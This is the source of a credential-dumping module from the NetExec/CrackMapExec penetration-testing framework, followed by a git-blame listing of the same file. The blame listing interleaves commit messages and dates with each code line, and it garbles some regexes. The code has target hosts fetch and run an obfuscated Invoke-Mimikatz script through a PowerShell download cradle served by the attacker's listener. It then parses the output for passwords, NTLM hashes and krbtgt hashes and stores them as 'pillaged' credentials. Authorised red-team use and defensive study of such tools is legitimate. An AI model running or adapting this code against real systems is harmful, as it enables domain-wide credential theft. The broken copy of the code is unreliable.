NetExec/cme/modules/mimikatz.py

from cme.helpers.powershell import obfs_ps_script, gen_ps_iex_cradle
from cme.helpers.misc import validate_ntlm
from cme.helpers.logger import write_log, highlight
from datetime import datetime
import re


class CMEModule:
    '''
        Executes PowerSploit's Invoke-Mimikatz.ps1 script
        Module by @byt3bl33d3r
    '''

    name = 'mimikatz'
    description = "Dumps all logon credentials from memory"
    supported_protocols = ['smb', 'mssql']
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        '''
           COMMAND  Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
        '''
        self.command = 'privilege::debug sekurlsa::logonpasswords exit'
        if module_options and 'COMMAND' in module_options:
            self.command = module_options['COMMAND']

        self.ps_script = obfs_ps_script('powersploit/Exfiltration/Invoke-Mimikatz.ps1')

    def on_admin_login(self, context, connection):
        command = "Invoke-Mimikatz -Command '{}'".format(self.command)
        launcher = gen_ps_iex_cradle(context, 'Invoke-Mimikatz.ps1', command)

        connection.ps_execute(launcher)
        context.log.success('Executed launcher')

    def on_request(self, context, request):
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.wfile.write(self.ps_script)

        else:
            request.send_response(404)
            request.end_headers()

    def uniquify_tuples(self, tuples):
        """
        uniquify mimikatz tuples based on the password
        cred format- (credType, domain, username, password, hostname, sid)

        Stolen from the Empire project.
        """
        seen = set()
        return [item for item in tuples if "{}{}{}{}".format(item[0],item[1],item[2],item[3]) not in seen and not seen.add("{}{}{}{}".format(item[0],item[1],item[2],item[3]))]

    def parse_mimikatz(self, data):
        """
        Parse the output from Invoke-Mimikatz to return credential sets.

        This was directly stolen from the Empire project as well.
        """

        # cred format:
        #   credType, domain, username, password, hostname, sid
        creds = []

        # regexes for "sekurlsa::logonpasswords" Mimikatz output
        regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)", "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)", "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]

        hostDomain = ""
        domainSid = ""
        hostName = ""

        lines = data.split("\n")
        for line in lines[0:2]:
            if line.startswith("Hostname:"):
                try:
                    domain = line.split(":")[1].strip()
                    temp = domain.split("/")[0].strip()
                    domainSid = domain.split("/")[1].strip()

                    hostName = temp.split(".")[0]
                    hostDomain = ".".join(temp.split(".")[1:])
                except:
                    pass

        for regex in regexes:

            p = re.compile(regex)

            for match in p.findall(data):

                lines2 = match.split("\n")
                username, domain, password = "", "", ""

                for line in lines2:
                    try:
                        if "Username" in line:
                            username = line.split(":",1)[1].strip()
                        elif "Domain" in line:
                            domain = line.split(":",1)[1].strip()
                        elif "NTLM" in line or "Password" in line:
                            password = line.split(":",1)[1].strip()
                    except:
                        pass

                if username != "" and password != "" and password != "(null)":

                    sid = ""

                    # substitute the FQDN in if it matches
                    if hostDomain.startswith(domain.lower()):
                        domain = hostDomain
                        sid = domainSid

                    if validate_ntlm(password):
                        credType = "hash"

                    else:
                        credType = "plaintext"

                    # ignore machine account plaintexts
                    if not (credType == "plaintext" and username.endswith("$")):
                        creds.append((credType, domain, username, password, hostName, sid))

        if len(creds) == 0:
            # check if we have lsadump output to check for krbtgt
            #   happens on domain controller hashdumps
            for x in xrange(8,13):
                if lines[x].startswith("Domain :"):

                    domain, sid, krbtgtHash = "", "", ""

                    try:
                        domainParts = lines[x].split(":")[1]
                        domain = domainParts.split("/")[0].strip()
                        sid = domainParts.split("/")[1].strip()

                        # substitute the FQDN in if it matches
                        if hostDomain.startswith(domain.lower()):
                            domain = hostDomain
                            sid = domainSid

                        for x in xrange(0, len(lines)):
                            if lines[x].startswith("User : krbtgt"):
                                krbtgtHash = lines[x+2].split(":")[1].strip()
                                break

                        if krbtgtHash != "":
                            creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
                    except Exception as e:
                        pass

        if len(creds) == 0:
            # check if we get lsadump::dcsync output
            if '** SAM ACCOUNT **' in lines:
                domain, user, userHash, dcName, sid = "", "", "", "", ""
                for line in lines:
                    try:
                        if line.strip().endswith("will be the domain"):
                            domain = line.split("'")[1]
                        elif line.strip().endswith("will be the DC server"):
                            dcName = line.split("'")[1].split(".")[0]
                        elif line.strip().startswith("SAM Username"):
                            user = line.split(":")[1].strip()
                        elif line.strip().startswith("Object Security ID"):
                            parts = line.split(":")[1].strip().split("-")
                            sid = "-".join(parts[0:-1])
                        elif line.strip().startswith("Hash NTLM:"):
                            userHash = line.split(":")[1].strip()
                    except:
                        pass

                if domain != "" and userHash != "":
                    creds.append(("hash", domain, user, userHash, dcName, sid))

        return self.uniquify_tuples(creds)

    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            if self.command.find('sekurlsa::logonpasswords') != -1:
                creds = self.parse_mimikatz(data)
                if len(creds):
                    for cred_set in creds:
                        credtype, domain, username, password,_,_ = cred_set
                        # Get the hostid from the DB
                        hostid = context.db.get_computers(response.client_address[0])[0][0]
                        context.db.add_credential(credtype, domain, username, password, pillaged_from=hostid)
                        context.log.highlight('{}\\{}:{}'.format(domain, username, password))

                    context.log.success("Added {} credential(s) to the database".format(highlight(len(creds))))
            else:
                context.log.highlight(data)

            log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved raw Mimikatz output to {}".format(log_name))
Fixed Powershell execution using MSSQL 2017-10-25 06:45:58 +00:00			`from cme.helpers.powershell import obfs_ps_script, gen_ps_iex_cradle`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`from cme.helpers.misc import validate_ntlm`
Fixed bug where creds dumped via mimikatz wouldn't be added to the database 2017-10-25 04:56:34 +00:00			`from cme.helpers.logger import write_log, highlight`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`from datetime import datetime`
			`import re`

Added WINRM support, NMap XML and .Nessus parsing - Added the WINRM protocol, CME now supports executing commands through WinRM (Powershell Remoting) - Added support for NMap XML and .Nessus files if given as targets - Fixed a bug in the MSSQL protocol which caused it to not retrieve host info - Version Bump 2017-10-25 02:08:19 +00:00
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`class CMEModule:`
			`'''`
			`Executes PowerSploit's Invoke-Mimikatz.ps1 script`
			`Module by @byt3bl33d3r`
			`'''`

Refactoring for packiging is now complete! 2016-06-04 07:13:38 +00:00			`name = 'mimikatz'`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`description = "Dumps all logon credentials from memory"`
			`supported_protocols = ['smb', 'mssql']`
DB schema for the smb protocol is now final! - added two more attributes to use in modules:opsec_safe and multiple_hosts - renamed db function names - Added the python_injector module and it's necessary files as a reminder 2016-12-20 07:23:40 +00:00			`opsec_safe = True`
			`multiple_hosts = True`
Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`def options(self, context, module_options):`
			`'''`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`'''`
Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00			`self.command = 'privilege::debug sekurlsa::logonpasswords exit'`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`if module_options and 'COMMAND' in module_options:`
Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00			`self.command = module_options['COMMAND']`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`self.ps_script = obfs_ps_script('powersploit/Exfiltration/Invoke-Mimikatz.ps1')`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`def on_admin_login(self, context, connection):`
			`command = "Invoke-Mimikatz -Command '{}'".format(self.command)`
Various fixes 2017-04-03 15:25:05 +00:00			`launcher = gen_ps_iex_cradle(context, 'Invoke-Mimikatz.ps1', command)`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00
Fixed Powershell execution using MSSQL 2017-10-25 06:45:58 +00:00			`connection.ps_execute(launcher)`
Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00			`context.log.success('Executed launcher')`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`def on_request(self, context, request):`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`if 'Invoke-Mimikatz.ps1' == request.path[1:]:`
			`request.send_response(200)`
			`request.end_headers()`

Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`request.wfile.write(self.ps_script)`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
			`else:`
			`request.send_response(404)`
			`request.end_headers()`

			`def uniquify_tuples(self, tuples):`
			`"""`
			`uniquify mimikatz tuples based on the password`
			`cred format- (credType, domain, username, password, hostname, sid)`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`Stolen from the Empire project.`
			`"""`
			`seen = set()`
			`return [item for item in tuples if "{}{}{}{}".format(item[0],item[1],item[2],item[3]) not in seen and not seen.add("{}{}{}{}".format(item[0],item[1],item[2],item[3]))]`

			`def parse_mimikatz(self, data):`
			`"""`
			`Parse the output from Invoke-Mimikatz to return credential sets.`

			`This was directly stolen from the Empire project as well.`
			`"""`

			`# cred format:`
			`# credType, domain, username, password, hostname, sid`
			`creds = []`

			`# regexes for "sekurlsa::logonpasswords" Mimikatz output`
			`regexes = ["(?s)(?<=msv :).?(?=tspkg :)", "(?s)(?<=tspkg :).?(?=wdigest :)", "(?s)(?<=wdigest :).?(?=kerberos :)", "(?s)(?<=kerberos :).?(?=ssp :)", "(?s)(?<=ssp :).?(?=credman :)", "(?s)(?<=credman :).?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]`

			`hostDomain = ""`
			`domainSid = ""`
			`hostName = ""`

			`lines = data.split("\n")`
			`for line in lines[0:2]:`
			`if line.startswith("Hostname:"):`
			`try:`
			`domain = line.split(":")[1].strip()`
			`temp = domain.split("/")[0].strip()`
			`domainSid = domain.split("/")[1].strip()`

			`hostName = temp.split(".")[0]`
			`hostDomain = ".".join(temp.split(".")[1:])`
			`except:`
			`pass`

			`for regex in regexes:`

			`p = re.compile(regex)`

			`for match in p.findall(data):`

			`lines2 = match.split("\n")`
			`username, domain, password = "", "", ""`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`for line in lines2:`
			`try:`
			`if "Username" in line:`
			`username = line.split(":",1)[1].strip()`
			`elif "Domain" in line:`
			`domain = line.split(":",1)[1].strip()`
			`elif "NTLM" in line or "Password" in line:`
			`password = line.split(":",1)[1].strip()`
			`except:`
			`pass`

			`if username != "" and password != "" and password != "(null)":`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`sid = ""`

			`# substitute the FQDN in if it matches`
			`if hostDomain.startswith(domain.lower()):`
			`domain = hostDomain`
			`sid = domainSid`

			`if validate_ntlm(password):`
			`credType = "hash"`

			`else:`
			`credType = "plaintext"`

			`# ignore machine account plaintexts`
			`if not (credType == "plaintext" and username.endswith("$")):`
			`creds.append((credType, domain, username, password, hostName, sid))`

			`if len(creds) == 0:`
			`# check if we have lsadump output to check for krbtgt`
			`# happens on domain controller hashdumps`
			`for x in xrange(8,13):`
			`if lines[x].startswith("Domain :"):`

			`domain, sid, krbtgtHash = "", "", ""`

			`try:`
			`domainParts = lines[x].split(":")[1]`
			`domain = domainParts.split("/")[0].strip()`
			`sid = domainParts.split("/")[1].strip()`

			`# substitute the FQDN in if it matches`
			`if hostDomain.startswith(domain.lower()):`
			`domain = hostDomain`
			`sid = domainSid`

			`for x in xrange(0, len(lines)):`
			`if lines[x].startswith("User : krbtgt"):`
			`krbtgtHash = lines[x+2].split(":")[1].strip()`
			`break`

			`if krbtgtHash != "":`
			`creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))`
			`except Exception as e:`
			`pass`

			`if len(creds) == 0:`
			`# check if we get lsadump::dcsync output`
			`if ' SAM ACCOUNT ' in lines:`
			`domain, user, userHash, dcName, sid = "", "", "", "", ""`
			`for line in lines:`
			`try:`
			`if line.strip().endswith("will be the domain"):`
			`domain = line.split("'")[1]`
			`elif line.strip().endswith("will be the DC server"):`
			`dcName = line.split("'")[1].split(".")[0]`
			`elif line.strip().startswith("SAM Username"):`
			`user = line.split(":")[1].strip()`
			`elif line.strip().startswith("Object Security ID"):`
			`parts = line.split(":")[1].strip().split("-")`
			`sid = "-".join(parts[0:-1])`
			`elif line.strip().startswith("Hash NTLM:"):`
			`userHash = line.split(":")[1].strip()`
			`except:`
			`pass`

			`if domain != "" and userHash != "":`
			`creds.append(("hash", domain, user, userHash, dcName, sid))`

			`return self.uniquify_tuples(creds)`

			`def on_response(self, context, response):`
			`response.send_response(200)`
			`response.end_headers()`
			`length = int(response.headers.getheader('content-length'))`
			`data = response.rfile.read(length)`

Fixed bug where creds dumped via mimikatz wouldn't be added to the database 2017-10-25 04:56:34 +00:00			`# We've received the response, stop tracking this host`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`response.stop_tracking_host()`

			`if len(data):`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`if self.command.find('sekurlsa::logonpasswords') != -1:`
			`creds = self.parse_mimikatz(data)`
			`if len(creds):`
			`for cred_set in creds:`
			`credtype, domain, username, password,_,_ = cred_set`
Fixed bug where creds dumped via mimikatz wouldn't be added to the database 2017-10-25 04:56:34 +00:00			`# Get the hostid from the DB`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`hostid = context.db.get_computers(response.client_address[0])[0][0]`
Fixed bug where creds dumped via mimikatz wouldn't be added to the database 2017-10-25 04:56:34 +00:00			`context.db.add_credential(credtype, domain, username, password, pillaged_from=hostid)`
Initial 4.0 pre-release 2017-03-27 21:09:36 +00:00			`context.log.highlight('{}\\{}:{}'.format(domain, username, password))`

			`context.log.success("Added {} credential(s) to the database".format(highlight(len(creds))))`
			`else:`
			`context.log.highlight(data)`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
			`log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))`
Refactoring for packiging is now complete! 2016-06-04 07:13:38 +00:00			`write_log(data, log_name)`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`context.log.info("Saved raw Mimikatz output to {}".format(log_name))`